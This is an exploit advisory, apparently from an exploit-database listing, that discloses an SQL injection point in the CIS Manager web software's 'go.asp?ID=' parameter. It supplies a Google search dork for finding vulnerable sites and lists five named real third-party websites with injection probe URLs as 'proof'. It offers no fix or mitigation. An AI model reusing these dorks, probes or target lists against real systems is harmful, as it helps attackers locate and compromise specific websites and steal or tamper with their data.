#******************************************************************************** # Exploit Title : CIS Manager SQL Injection Vulnerabilites # # Exploit Author : Ashiyane Digital Security Team # # Software Link : http://www.construtiva.com.br # # Tested on: Windows 7 , Linux # # Google Dork : intext:"Powered by CIS Manager" # # Date: 2013/09/10 # -------------------------------------------------------------------- # Exploit : Sql Injection # # Location : [Target]/artigosnoticias/go.asp?ID=[Sql Injection] # # # Proof: # # http://www.agvlogistica.com.br/artigosnoticias/go.asp?ID=' # # http://www.beashair.com.br/artigosnoticias/go.asp?ID=' # # http://www.empregoppds.com.br/artigosnoticias/go.asp?ID=' # # http://www.fieldlogger.com.br/artigosnoticias/go.asp?ID=' # # http://www.gecepel.com.br/artigosnoticias/go.asp?ID=' # ###################### discovered by : ACC3SS ######################